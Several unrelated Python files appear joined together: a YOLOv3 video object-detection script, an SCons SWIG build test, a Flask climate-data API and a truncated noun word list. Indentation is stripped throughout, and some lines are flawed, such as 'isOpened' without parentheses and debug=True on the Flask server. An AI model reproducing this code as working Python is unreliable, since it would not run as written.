super(ChangeInputCommand, self).__init__(device_type, "CURRENT_INPUT", id, name)
|
# -*- coding: utf-8 -*-
"""
@author: abhilash
"""
import numpy as np
import cv2
#get the webcam video stream
file_video_stream = cv2.VideoCapture('images/testing/video_sample2.mp4')
#create a while loop
while (file_video_stream.isOpened):
#get the current frame from video stream
ret,current_frame = file_video_stream.read()
#use the video current frame instead of image
img_to_detect = current_frame
img_height = img_to_detect.shape[0]
img_width = img_to_detect.shape[1]
# convert to blob to pass into model
img_blob = cv2.dnn.blobFromImage(img_to_detect, 0.003922, (416, 416), swapRB=True, crop=False)
#recommended by yolo authors, scale factor is 0.003922=1/255, width,height of blob is 320,320
#accepted sizes are 320×320,416×416,609×609. More size means more accuracy but less speed
# set of 80 class labels
class_labels = ["person","bicycle","car","motorcycle","airplane","bus","train","truck","boat",
"trafficlight","firehydrant","stopsign","parkingmeter","bench","bird","cat",
"dog","horse","sheep","cow","elephant","bear","zebra","giraffe","backpack",
"umbrella","handbag","tie","suitcase","frisbee","skis","snowboard","sportsball",
"kite","baseballbat","baseballglove","skateboard","surfboard","tennisracket",
"bottle","wineglass","cup","fork","knife","spoon","bowl","banana","apple",
"sandwich","orange","broccoli","carrot","hotdog","pizza","donut","cake","chair",
"sofa","pottedplant","bed","diningtable","toilet","tvmonitor","laptop","mouse",
"remote","keyboard","cellphone","microwave","oven","toaster","sink","refrigerator",
"book","clock","vase","scissors","teddybear","hairdrier","toothbrush"]
#Declare List of colors as an array
#Green, Blue, Red, cyan, yellow, purple
#Split based on ',' and for every split, change type to int
#convert that to a numpy array to apply color mask to the image numpy array
class_colors = ["0,255,0","0,0,255","255,0,0","255,255,0","0,255,255"]
class_colors = [np.array(every_color.split(",")).astype("int") for every_color in class_colors]
class_colors = np.array(class_colors)
class_colors = np.tile(class_colors,(16,1))
# Loading pretrained model
# input preprocessed blob into model and pass through the model
# obtain the detection predictions by the model using forward() method
yolo_model = cv2.dnn.readNetFromDarknet('model/yolov3.cfg','model/yolov3.weights')
# Get all layers from the yolo network
# Loop and find the last layer (output layer) of the yolo network
yolo_layers = yolo_model.getLayerNames()
yolo_output_layer = [yolo_layers[yolo_layer[0] - 1] for yolo_layer in yolo_model.getUnconnectedOutLayers()]
# input preprocessed blob into model and pass through the model
yolo_model.setInput(img_blob)
# obtain the detection layers by forwarding through till the output layer
obj_detection_layers = yolo_model.forward(yolo_output_layer)
############## NMS Change 1 ###############
# initialization for non-max suppression (NMS)
# declare list for [class id], [box center, width & height[], [confidences]
class_ids_list = []
boxes_list = []
confidences_list = []
############## NMS Change 1 END ###########
# loop over each of the layer outputs
for object_detection_layer in obj_detection_layers:
# loop over the detections
for object_detection in object_detection_layer:
# obj_detections[1 to 4] => will have the two center points, box width and box height
# obj_detections[5] => will have scores for all objects within bounding box
all_scores = object_detection[5:]
predicted_class_id = np.argmax(all_scores)
prediction_confidence = all_scores[predicted_class_id]
# take only predictions with confidence more than 20%
if prediction_confidence > 0.20:
#get the predicted label
predicted_class_label = class_labels[predicted_class_id]
#obtain the bounding box co-oridnates for actual image from resized image size
bounding_box = object_detection[0:4] * np.array([img_width, img_height, img_width, img_height])
(box_center_x_pt, box_center_y_pt, box_width, box_height) = bounding_box.astype("int")
start_x_pt = int(box_center_x_pt - (box_width / 2))
start_y_pt = int(box_center_y_pt - (box_height / 2))
############## NMS Change 2 ###############
#save class id, start x, y, width & height, confidences in a list for nms processing
#make sure to pass confidence as float and width and height as integers
class_ids_list.append(predicted_class_id)
confidences_list.append(float(prediction_confidence))
boxes_list.append([start_x_pt, start_y_pt, int(box_width), int(box_height)])
############## NMS Change 2 END ###########
############## NMS Change 3 ###############
# Applying the NMS will return only the selected max value ids while suppressing the non maximum (weak) overlapping bounding boxes
# Non-Maxima Suppression confidence set as 0.5 & max_suppression threhold for NMS as 0.4 (adjust and try for better perfomance)
max_value_ids = cv2.dnn.NMSBoxes(boxes_list, confidences_list, 0.5, 0.4)
# loop through the final set of detections remaining after NMS and draw bounding box and write text
for max_valueid in max_value_ids:
max_class_id = max_valueid[0]
box = boxes_list[max_class_id]
start_x_pt = box[0]
start_y_pt = box[1]
box_width = box[2]
box_height = box[3]
#get the predicted class id and label
predicted_class_id = class_ids_list[max_class_id]
predicted_class_label = class_labels[predicted_class_id]
prediction_confidence = confidences_list[max_class_id]
############## NMS Change 3 END ###########
end_x_pt = start_x_pt + box_width
end_y_pt = start_y_pt + box_height
#get a random mask color from the numpy array of colors
box_color = class_colors[predicted_class_id]
#convert the color numpy array as a list and apply to text and box
box_color = [int(c) for c in box_color]
# print the prediction in console
predicted_class_label = "{}: {:.2f}%".format(predicted_class_label, prediction_confidence * 100)
print("predicted object {}".format(predicted_class_label))
# draw rectangle and text in the image
cv2.rectangle(img_to_detect, (start_x_pt, start_y_pt), (end_x_pt, end_y_pt), box_color, 1)
cv2.putText(img_to_detect, predicted_class_label, (start_x_pt, start_y_pt-5), cv2.FONT_HERSHEY_SIMPLEX, 0.5, box_color, 1)
cv2.imshow("Detection Output", img_to_detect)
#terminate while loop if 'q' key is pressed
if cv2.waitKey(1) & 0xFF == ord('q'):
break
#releasing the stream and the camera
#close all opencv windows
file_video_stream.release()
cv2.destroyAllWindows()
|
#!/usr/bin/env python
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
"""
Make sure SWIG works when a VariantDir (or variant_dir) is used.
Test case courtesy Joe Maruszewski.
"""
import sys
import TestSCons
test = TestSCons.TestSCons()
swig = test.where_is('swig')
if not swig:
test.skip_test('Can not find installed "swig", skipping test.\n')
# swig-python expects specific filenames.
# the platform specific suffix won't necessarily work.
if sys.platform == 'win32':
_dll = '.dll'
else:
_dll = '.so'
test.subdir(['source'])
python, python_include, python_libpath, python_lib = \
test.get_platform_python_info(python_h_required=True)
if sys.platform == 'win32' and sys.maxsize <= 2**32:
swig_arch_var="TARGET_ARCH='x86',"
else:
swig_arch_var=""
test.write(['SConstruct'], """\
#
# Create the build environment.
#
env = Environment(CPPPATH = [".", r'%(python_include)s'],
%(swig_arch_var)s
CPPDEFINES = "NDEBUG",
SWIG = [r'%(swig)s'],
SWIGFLAGS = ["-python", "-c++"],
SWIGCXXFILESUFFIX = "_wrap.cpp",
LDMODULEPREFIX='_',
LDMODULESUFFIX='%(_dll)s',
LIBPATH=[r'%(python_libpath)s'],
LIBS='%(python_lib)s',
)
Export("env")
#
# Build the libraries.
#
SConscript("source/SConscript", variant_dir = "build")
""" % locals())
test.write(['source', 'SConscript'], """\
Import("env")
lib = env.SharedLibrary("_linalg",
"linalg.i",
SHLIBPREFIX = "",
SHLIBSUFFIX = ".pyd")
""")
test.write(['source', 'Vector.hpp'], """\
class Vector
{
public:
Vector(int size = 0) : _size(size)
{
_v = new double[_size];
for (int i = 0; i < _size; ++i)
_v[i] = 0.0;
}
~Vector() { delete [] _v; }
int size() const { return _size; }
double& operator[](int key) { return _v[key]; }
double const& operator[](int key) const { return _v[key]; }
private:
int _size;
double* _v;
};
""")
test.write(['source', 'linalg.i'], """\
%module linalg
%{
#include <sstream>
#include "Vector.hpp"
%}
class Vector
{
public:
Vector(int n = 0);
~Vector();
%extend
{
const char* __str__() { return "linalg.Vector()"; }
%pythoncode %{
def __iter__(self):
for s in self:
yield s
%}
}
};
""")
## _python_ = TestSCons._python_
## XXX: @ptomulik: looks like it was unused?
## test.write(['source', 'test.py'], """\
## #!%(_python_)s
## from __future__ import print_function
##
## import linalg
##
##
## x = linalg.Vector(5)
## print(x)
##
## x[1] = 99.5
## x[3] = 8.3
## x[4] = 11.1
##
##
## for i, v in enumerate(x):
## print("\tx[%%d] = %%g" %% (i, v))
##
## """ % locals())
test.run(arguments = '.')
test.up_to_date(arguments = '.')
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
import numpy as np
import datetime as dt
import pandas as pd
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, func, inspect
from flask import Flask, jsonify
#################################################
# Database Setup
#################################################
engine = create_engine("sqlite:///Resources/hawaii.sqlite")
# reflect an existing database into a new model
Base = automap_base()
# reflect the tables
Base.prepare(engine, reflect=True)
# Save reference to the table
Measurement = Base.classes.measurement
Station = Base.classes.station
# Session link from python to DB
session = Session(engine)
#################################################
# Flask Setup
#################################################
app = Flask(__name__)
#################################################
# Flask Routes
#################################################
@app.route("/")
def welcome():
"""List all available api routes."""
return (
f"Welcome to the Hawaii Climate Analysis API!<br/>"
f"Available Routes:<br/>"
f"/api/v1.0/precipitation<br/>"
f"/api/v1.0/stations<br/>"
f"/api/v1.0/tobs<br/>"
f"/api/v1.0/temp/start<br/>"
f"/api/v1.0/temp/start/end"
)
@app.route("/api/v1.0/precipitation")
def precipitation():
session = Session(engine)
data = session.query(Measurement.date, Measurement.prcp).\
order_by(Measurement.date).all()
precip_dates = []
for date, prcp in data:
new_dict = {}
new_dict[date] = prcp
precip_dates.append(new_dict)
session.close()
return jsonify(precip_dates)
@app.route("/api/v1.0/stations")
def stations():
results = session.query(Station.station).all()
stations = list(np.ravel(results))
session.close()
return jsonify(stations)
@app.route("/api/v1.0/tobs")
def tobs():
lastdate = session.query(Measurement.date).order_by(
Measurement.date.desc()).first()
last_date = dt.datetime.strptime(lastdate[0], '%Y-%m-%d')
query_date = dt.date(last_date.year, last_date.month,
last_date.day) - dt.timedelta(days=365)
results = session.query(Measurement.date, Measurement.tobs).filter(
Measurement.date >= query_date).all()
all_tobs = []
for row in results:
tobs_dict = {}
tobs_dict["date"] = row.date
tobs_dict["tobs"] = row.tobs
all_tobs.append(tobs_dict)
session.close()
return jsonify(all_tobs)
@app.route("/api/v1.0/temp/start")
def stats():
start_date = session.query(func.min(Measurement.date)).all()[0][0]
sel = [func.min(Measurement.tobs),func.avg(Measurement.tobs),func.max(Measurement.tobs)]
temp_lstuple = session.query(*sel).filter(Measurement.date >= start_date).all()
session.close()
temp_pram1_list = list(np.ravel(temp_lstuple))
temp_list =[]
for t in temp_lstuple:
temp_dict = {}
temp_dict["Min Temp"] = temp_pram1_list[0]
temp_dict["Avg Temp"] = temp_pram1_list[1]
temp_dict["Max Temp"] = temp_pram1_list[2]
temp_list.append(temp_dict)
return jsonify(temp_list)
@app.route("/api/v1.0/temp/start/end")
def tempstartend(start=None, end=None):
sel = [func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)]
temps_q = session.query(*sel).filter(Measurement.date >= start).filter(Measurement.date <= end).all()
temps = list(np.ravel(temps_q))
return jsonify(temps)
if __name__ == '__main__':
app.run(debug=True)
|
# from urllib import urlopen
import random
# got the list from here, no point grabbing it each time though...
# webpage = urlopen('http://dictionary-thesaurus.com/wordlists/Nouns%285,449%29.txt').read()
# word_list = webpage.splitlines()
word_list = ['abbreviation', 'abbreviations', 'abettor', 'abettors', 'abilities', 'ability', 'abrasion', 'abrasions', 'abrasive', 'abrasives', 'absence', 'absences', 'abuse', 'abuser', 'abusers', 'abuses', 'acceleration', 'accelerations', 'acceptance', 'acceptances', 'acceptor', 'acceptors', 'access', 'accesses', 'accessories', 'accessory', 'accident', 'accidents', 'accommodation', 'accomplishment', 'accomplishments', 'accord', 'accordance', 'account', 'accountabilities', 'accountability', 'accounts', 'accrual', 'accruals', 'accruement', 'accumulation', 'accumulations', 'accuracy', 'accusation', 'accusations', 'acid', 'acids', 'acquisition', 'acquisitions', 'acquittal', 'acquittals', 'acre', 'acres', 'acronym', 'acronyms', 'act', 'action', 'actions', 'activities', 'activity', 'acts', 'adaption', 'adaptions', 'addition', 'additions', 'additive', 'additives', 'address', 'addressee', 'addressees', 'addresses', 'adherence', 'adherences', 'adhesive', 'adhesives', 'adjective', 'adjectives', 'adjustment', 'adjustments', 'administration', 'administrations', 'administrator', 'administrators', 'admiral', 'admirals', 'admiralties', 'admiralty', 'admission', 'admissions', 'advance', 'advancement', 'advancements', 'advances', 'advantage', 'advantages', 'adverb', 'adverbs', 'advertisement', 'advertisements', 'adviser', 'advisers', 'affair', 'affairs', 'affiant', 'affiants', 'afternoon', 'afternoons', 'age', 'agent', 'agents', 'ages', 'aggravation', 'aggravations', 'agreement', 'agreements', 'aid', 'aids', 'aim', 'aims', 'air', 'aircraft', 'airfield', 'airfields', 'airplane', 'airplanes', 'airport', 'airports', 'airs', 'airship', 'airships', 'airspeed', 'airspeeds', 'alarm', 'alarms', 'alcohol', 'alcoholic', 'alcoholics', 'alcoholism', 'alcohols', 'alert', 'alerts', 'algebra', 'algorithm', 'algorithms', 'alias', 'aliases', 'alibi', 'alibis', 'alignment', 'alignments', 'alkalinity', 'allegation', 'allegations', 'alley', 'alleys', 'allies', 'allocation', 'allocations', 'allotment', 'allotments', 'allowance', 'allowances', 'alloy', 'alloys', 'ally', 'alphabet', 'alphabets', 'alternate', 'alternates', 'alternation', 'alternations', 'alternative', 'alternatives', 'altimeter', 'altimeters', 'altitude', 'altitudes', 'aluminum', 'aluminums', 'ambiguity', 'americans', 'ammonia', 'ammunition', 'amount', 'amounts', 'amperage', 'amperages', 'ampere', 'amperes', 'amplifier', 'amplifiers', 'amplitude', 'amplitudes', 'amusement', 'amusements', 'analog', 'analogs', 'analyses', 'analysis', 'analyst', 'analysts', 'analyzer', 'analyzers', 'anchor', 'anchors', 'angle', 'angles', 'animal', 'animals', 'annex', 'annexs', 'answer', 'answers', 'antenna', 'antennas', 'anthem', 'anthems', 'anticipation', 'apostrophe', 'apostrophes', 'apparatus', 'apparatuses', 'appeal', 'appeals', 'appearance', 'appearances', 'appellate', 'apple', 'apples', 'applicant', 'applicants', 'application', 'applications', 'apportionment', 'apportionments', 'appraisal', 'appraisals', 'apprehension', 'apprehensions', 'apprenticeship', 'apprenticeships', 'approach', 'approaches', 'appropriation', 'appropriations', 'approval', 'approvals', 'april', 'apron', 'aprons', 'aptitude', 'aptitudes', 'arc', 'arch', 'arches', 'architecture', 'arcs', 'area', 'areas', 'argument', 'arguments', 'arithmetic', 'arm', 'armament', 'armaments', 'armful', 'armfuls', 'armies', 'armor', 'armories', 'armors', 'armory', 'arms', 'army', 'arraignment', 'arraignments', 'arrangement', 'arrangements', 'array', 'arrays', 'arrest', 'arrests', 'arrival', 'arrivals', 'arrow', 'arrows', 'art', 'article', 'articles', 'artilleries', 'artillery', 'arts', 'assault', 'assaults', 'assemblies', 'assembly', 'assignment', 'assignments', 'assistance', 'assistant', 'assistants', 'associate', 'associates', 'asterisk', 'asterisks', 'athwartship', 'atmosphere', 'atmospheres', 'atom', 'atoms', 'attachment', 'attachments', 'attack', 'attacker', 'attackers', 'attempt', 'attempts', 'attention', 'attesting', 'attitude', 'attitudes', 'attorney', 'attorneys', 'attraction', 'attractions', 'attribute', 'attributes', 'audit', 'auditor', 'auditors', 'audits', 'augmentation', 'augmentations', 'august', 'authorities', 'authority', 'authorization', 'authorizations', 'auto', 'automation', 'automobile', 'automobiles', 'autos', 'auxiliaries', 'average', 'averages', 'aviation', 'award', 'awards', 'ax', 'axes', 'axis', 'azimuth', 'azimuths', 'babies', 'baby', 'back', 'background', 'backgrounds', 'backs', 'backup', 'backups', 'badge', 'badges', 'bag', 'bags', 'bail', 'bailing', 'bails', 'balance', 'balances', 'ball', 'ballast', 'balloon', 'balloons', 'balls', 'band', 'bandage', 'bandages', 'bands', 'bang', 'bangs', 'bank', 'banks', 'bar', 'barge', 'barges', 'barometer', 'barometers', 'barrel', 'barrels', 'barrier', 'barriers', 'bars', 'base', 'baseline', 'basement', 'basements', 'bases', 'basics', 'basin', 'basins', 'basis', 'basket', 'baskets', 'bat', 'batch', 'batches', 'bath', 'bather', 'baths', 'bats', 'batteries', 'battery', 'battle', 'battles', 'battleship', 'battleships', 'baud', 'bauds', 'bay', 'bays', 'beach', 'beaches', 'beacon', 'beacons', 'bead', 'beads', 'beam', 'beams', 'bean', 'beans', 'bear', 'bearings', 'bears', 'beat', 'beats', 'bed', 'beds', 'beginner', 'beginners', 'behavior', 'behaviors', 'being', 'beings', 'belief', 'beliefs', 'bell', 'bells', 'belt', 'belts', 'bench', 'benches', 'bend', 'bends', 'benefit', 'benefits', 'berries', 'berry', 'berth', 'berthings', 'berths', 'bet', 'bets', 'bias', 'biases', 'bigamies', 'bigamy', 'bilge', 'bill', 'billet', 'billets', 'bills', 'bin', 'binder', 'binders', 'binoculars', 'bins', 'birth', 'births', 'bit', 'bite', 'bites', 'bits', 'blackboard', 'blackboards', 'blade', 'blades', 'blank', 'blanket', 'blankets', 'blanks', 'blast', 'blasts', 'blaze', 'blazes', 'blindfold', 'blindfolds', 'blink', 'blinks', 'block', 'blocks', 'blood', 'blot', 'blots', 'blow', 'blower', 'blowers', 'blows', 'blueprint', 'blueprints', 'blur', 'blurs', 'board', 'boards', 'boat', 'boats', 'boatswain', 'boatswains', 'bodies', 'body', 'boil', 'boiler', 'boilers', 'boils', 'bolt', 'bolts', 'bomb', 'bombs', 'bond', 'bonds', 'bone', 'bones', 'book', 'books', 'boom', 'booms', 'boost', 'boosts', 'boot', 'boots', 'bore', 'boresight', 'boresights', 'bottle', 'bottles', 'bottom', 'bottoms', 'bow', 'bowl', 'bowls', 'bows', 'box', 'boxcar', 'boxcars', 'boxes', 'boy', 'boys', 'brace', 'braces', 'bracket', 'brackets', 'braid', 'braids', 'brain', 'brains', 'brake', 'brakes', 'branch', 'branches', 'brass', 'breach', 'breaches', 'bread', 'breads', 'break', 'breakdown', 'breakdowns', 'breaks', 'breast', 'breasts', 'breath', 'breaths', 'breeze', 'breezes', 'brick', 'bricks', 'bridge', 'bridges', 'briefings', 'brightness', 'bristle', 'bristles', 'broadcasts', 'bronze', 'brook', 'brooks', 'broom', 'brooms', 'brother', 'brothers', 'brush', 'brushes', 'bubble', 'bubbles', 'bucket', 'buckets', 'buckle', 'buckles', 'bud', 'budget', 'budgets', 'buds', 'buffer', 'buffers', 'builder', 'builders', 'building', 'buildings', 'bulb', 'bulbs', 'bulk', 'bulkhead', 'bulkheads', 'bullet', 'bullets', 'bump', 'bumps', 'bunch', 'bunches', 'bundle', 'bundles', 'bunk', 'bunks', 'buoy', 'buoys', 'bureau', 'bureaus', 'burglaries', 'burglary', 'burn', 'burns', 'bus', 'buses', 'bush', 'bushel', 'bushels', 'bushes', 'bushing', 'bushings', 'business', 'businesses', 'butt', 'butter', 'butters', 'button', 'buttons', 'butts', 'buy', 'buys', 'buzz', 'buzzer', 'buzzers', 'buzzes', 'bypass', 'bypasses', 'byte', 'bytes', 'cab', 'cabinet', 'cabinets', 'cable', 'cables', 'cabs', 'cage', 'cages', 'cake', 'cakes', 'calculation', 'calculations', 'calculator', 'calculators', 'calendar', 'calendars', 'caliber', 'calibers', 'calibration', 'calibrations', 'call', 'calls', 'calorie', 'calories', 'cam', 'camera', 'cameras', 'camp', 'camps', 'cams', 'canal', 'canals', 'candidate', 'candidates', 'candle', 'candles', 'cane', 'canister', 'canisters', 'cannon', 'cannons', 'cans', 'canvas', 'canvases', 'canyon', 'canyons', 'cap', 'capabilities', 'capability', 'capacitance', 'capacitances', 'capacities', 'capacitor', 'capacitors', 'capacity', 'cape', 'capes', 'capital', 'capitals', 'caps', 'capstan', 'capstans', 'captain', 'captains', 'capture', 'captures', 'car', 'carbon', 'carbons', 'carburetor', 'carburetors', 'card', 'cardboard', 'cards', 'care', 'career', 'careers', 'carelessness', 'cares', 'cargo', 'cargoes', 'carload', 'carloads', 'carpet', 'carpets', 'carriage', 'carriages', 'carrier', 'carriers', 'cars', 'cart', 'cartridge', 'cartridges', 'carts', 'case', 'cases', 'cash', 'cashier', 'cashiers', 'casts', 'casualties', 'casualty', 'catalog', 'catalogs', 'catch', 'catcher', 'catchers', 'catches', 'categories', 'category', 'cathode', 'cathodes', 'cause', 'causes', 'caution', 'cautions', 'cave', 'caves', 'cavities', 'cavity', 'ceiling', 'ceilings', 'cell', 'cellar', 'cellars', 'cells', 'cement', 'cements', 'cent', 'center', 'centerline', 'centerlines', 'centers', 'centimeter', 'centimeters', 'cents', 'ceramics', 'ceremonies', 'ceremony', 'certificate', 'certificates', 'certification', 'certifications', 'chain', 'chains', 'chair', 'chairman', 'chairmen', 'chairperson', 'chairpersons', 'chairs', 'chairwoman', 'chairwomen', 'chalk', 'chalks', 'challenge', 'challenges', 'chamber', 'chambers', 'chance', 'chances', 'change', 'changes', 'channel', 'channels', 'chaplain', 'chaplains', 'chapter', 'chapters', 'character', 'characteristic', 'characteristics', 'characters', 'charge', 'charges', 'chart', 'charts', 'chase', 'chases', 'chattel', 'chattels', 'chatter', 'cheat', 'cheater', 'cheaters', 'cheats', 'check', 'checker', 'checkers', 'checkout', 'checkouts', 'checkpoint', 'checkpoints', 'checks', 'cheek', 'cheeks', 'cheese', 'cheeses', 'chemical', 'chemicals', 'chemistry', 'chest', 'chests', 'chief', 'chiefs', 'child', 'children', 'chill', 'chills', 'chimney', 'chimneys', 'chin', 'chins', 'chip', 'chips', 'chit', 'chits', 'chock', 'chocks', 'choice', 'choices', 'choke', 'chokes', 'church', 'churches', 'churn', 'churns', 'circle', 'circles', 'circuit', 'circuitries', 'circuitry', 'circuits', 'circulation', 'circulations', 'circumference', 'circumferences', 'circumstance', 'circumstances', 'cities', 'citizen', 'citizens', 'city', 'civilian', 'civilians', 'claim', 'claims', 'clamp', 'clamps', 'clang', 'clangs', 'clap', 'claps', 'class', 'classes', 'classification', 'classifications', 'classroom', 'classrooms', 'claw', 'claws', 'clay', 'cleanliness', 'cleanser', 'cleansers', 'clearance', 'clearances', 'cleat', 'cleats', 'clericals', 'clerk', 'clerks', 'click', 'clicks', 'cliff', 'cliffs', 'clip', 'clips', 'clock', 'clocks', 'closure', 'closures', 'cloth', 'clothes', 'clothing', 'cloths', 'cloud', 'cloudiness', 'clouds', 'club', 'clubs', 'clump', 'clumps', 'coal', 'coals', 'coast', 'coasts', 'coat', 'coating', 'coats', 'cockpit', 'cockpits', 'code', 'coder', 'coders', 'codes', 'coil', 'coils', 'coin', 'coins', 'colds', 'collar', 'collars', 'collection', 'collections', 'collector', 'collectors', 'college', 'colleges', 'collision', 'collisions', 'colon', 'colons', 'color', 'colors', 'column', 'columns', 'comb', 'combat', 'combatant', 'combatants', 'combination', 'combinations', 'combs', 'combustion', 'comfort', 'comforts', 'comma', 'command', 'commander', 'commanders', 'commands', 'commas', 'commendation', 'commendations', 'comment', 'comments', 'commission', 'commissions', 'commitment', 'commitments', 'committee', 'committees', 'communication', 'communications', 'communities', 'community', 'companies', 'company', 'comparison', 'comparisons', 'compartment', 'compartments', 'compass', 'compasses', 'compensation', 'compensations', 'competition', 'competitions', 'compiler', 'compilers', 'complaint', 'complaints', 'complement', 'complements', 'completion', 'completions', 'complexes', 'compliance', 'compliances', 'component', 'components', 'composites', 'composition', 'compositions', 'compounds', 'compress', 'compresses', 'compression', 'compressions', 'compressor', 'compressors', 'compromise', 'compromises', 'computation', 'computations', 'computer', 'computers', 'concentration', 'concentrations', 'concept', 'concepts', 'concern', 'concerns', 'concurrence', 'condensation', 'condensations', 'condenser', 'condensers', 'condition', 'conditions', 'conduct', 'conductor', 'conductors', 'conducts', 'cone', 'cones', 'conference', 'conferences', 'confession', 'confessions', 'confidence', 'confidences', 'configuration', 'configurations', 'confinement', 'confinements', 'conflict', 'conflicts', 'confusion', 'confusions', 'congress', 'conjecture', 'conjectures', 'conjunction', 'conjunctions', 'conn', 'connection', 'connections', 'consequence', 'consequences', 'consideration', 'console', 'consoles', 'consolidation', 'conspiracies', 'conspiracy', 'constitution', 'construction', 'contact', 'contacts', 'container', 'containers', 'contamination', 'contempt', 'content', 'contention', 'contents', 'continuity', 'contraband', 'contract', 'contracts', 'contrast', 'contrasts', 'contribution', 'contributions', 'control', 'controls', 'convenience', 'conveniences', 'convention', 'conventions', 'conversion', 'conversions', 'convulsion', 'convulsions', 'coordinate', 'coordinates', 'coordination', 'coordinations', 'coordinator', 'coordinators', 'copies', 'copper', 'copy', 'cord', 'cords', 'core', 'cores', 'cork', 'corks', 'corner', 'corners', 'corps', 'correction', 'corrections', 'correlation', 'correlations', 'correspondence', 'corrosion', 'cosal', 'cosals', 'costs', 'cot', 'cots', 'cotton', 'cottons', 'cough', 'coughs', 'counsel', 'counselor', 'counselors', 'counsels', 'count', 'counter', 'countermeasure', 'countermeasures', 'counters', 'countries', 'country', 'counts', 'couple', 'couples', 'couplings', 'course', 'courses', 'court', 'courtesies', 'courtesy', 'courts', 'cover', 'coxswain', 'coxswains', 'crack', 'cracks', 'cradle', 'cradles', 'craft', 'crafts', 'cramp', 'cramps', 'crank', 'cranks', 'crash', 'crashes', 'crawl', 'credibility', 'credit', 'credits', 'creek', 'creeks', 'crew', 'crewmember', 'crewmembers', 'crews', 'cries', 'crime', 'crimes', 'crop', 'crops', 'cross', 'crosses', 'crowd', 'crowds', 'crown', 'crowns', 'cruise', 'cruiser', 'cruisers', 'cruises', 'crust', 'crusts', 'cry', 'crystal', 'crystals', 'cube', 'cubes', 'cuff', 'cuffs', 'cup', 'cupful', 'cupfuls', 'cups', 'cure', 'cures', 'curl', 'curls', 'currencies', 'currency', 'currents', 'curtain', 'curtains', 'curvature', 'curvatures', 'curve', 'curves', 'cushion', 'cushions', 'custodian', 'custodians', 'custody', 'custom', 'customer', 'customers', 'customs', 'cuts', 'cycle', 'cycles', 'cylinder', 'cylinders', 'dab', 'dabs', 'dam', 'damage', 'damages', 'dams', 'danger', 'dangers', 'dare', 'dares', 'dart', 'darts', 'dash', 'data', 'date', 'dates', 'daughter', 'daughters', 'davit', 'davits', 'dawn', 'dawns', 'day', 'daybreak', 'days', 'daytime', 'deal', 'dealer', 'dealers', 'deals', 'dears', 'death', 'deaths', 'debit', 'debits', 'debris', 'debt', 'debts', 'decay', 'december', 'decibel', 'decibels', 'decimals', 'decision', 'decisions', 'deck', 'decks', 'decoder', 'decoders', 'decontamination', 'decoration', 'decorations', 'decrease', 'decreases', 'decrement', 'decrements', 'dedication', 'dedications', 'deduction', 'deductions', 'deed', 'deeds', 'default', 'defaults', 'defeat', 'defeats', 'defect', 'defection', 'defections', 'defects', 'defense', 'defenses', 'deficiencies', 'definition', 'definitions', 'deflector', 'deflectors', 'degree', 'degrees', 'delay', 'delays', 'delegate', 'delegates', 'deletion', 'deletions', 'delight', 'delights', 'delimiter', 'delimiters', 'deliveries', 'delivery', 'democracies', 'democracy', 'demonstration', 'demonstrations', 'densities', 'density', 'dent', 'dents', 'department', 'departments', 'departure', 'departures', 'dependence', 'dependencies', 'dependents', 'depletion', 'depletions', 'deployment', 'deployments', 'deposit', 'deposition', 'depositions', 'deposits', 'depot', 'depots', 'depth', 'depths', 'deputies', 'deputy', 'dereliction', 'description', 'descriptions', 'desert', 'deserter', 'deserters', 'desertion', 'desertions', 'deserts', 'designation', 'designations', 'designator', 'designators', 'desire', 'desires', 'desk', 'desks', 'destination', 'destinations', 'destroyer', 'destroyers', 'destruction', 'detachment', 'detachments', 'detail', 'details', 'detection', 'detent', 'detention', 'detentions', 'detents', 'detonation', 'detonations', 'development', 'developments', 'deviation', 'deviations', 'device', 'devices', 'dew', 'diagnoses', 'diagnosis', 'diagnostics', 'diagonals', 'diagram', 'diagrams', 'dial', 'dials', 'diameter', 'diameters', 'diamond', 'diamonds', 'diaphragm', 'diaphragms', 'diaries', 'diary', 'dictionaries', 'dictionary', 'diesel', 'diesels', 'difference', 'differences', 'difficulties', 'difficulty', 'digestion', 'digit', 'digits', 'dimension', 'dimensions', 'diode', 'diodes', 'dioxide', 'dioxides', 'dip', 'dips', 'direction', 'directions', 'directive', 'directives', 'directories', 'directory', 'dirt', 'disabilities', 'disability', 'disadvantage', 'disadvantages', 'disassemblies', 'disassembly', 'disaster', 'disasters', 'discard', 'discards', 'discharge', 'discharges', 'discipline', 'disciplines', 'discontinuance', 'discontinuances', 'discontinuation', 'discontinuations', 'discount', 'discounts', 'discoveries', 'discovery', 'discrepancies', 'discrepancy', 'discretion', 'discrimination', 'discriminations', 'discussion', 'discussions', 'disease', 'diseases', 'disgust', 'dish', 'dishes', 'disk', 'disks', 'dispatch', 'dispatcher', 'dispatchers', 'dispatches', 'displacement', 'displacements', 'display', 'displays', 'disposal', 'dissemination', 'dissipation', 'distance', 'distances', 'distortion', 'distortions', 'distress', 'distresses', 'distribution', 'distributions', 'distributor', 'distributors', 'district', 'districts', 'ditch', 'ditches', 'ditto', 'dittos', 'dive', 'diver', 'divers', 'dives', 'divider', 'dividers', 'division', 'divisions', 'dock', 'dockings', 'docks', 'document', 'documentation', 'documentations', 'documents', 'dollar', 'dollars', 'dollies', 'dolly', 'dominion', 'dominions', 'donor', 'donors', 'door', 'doorknob', 'doorknobs', 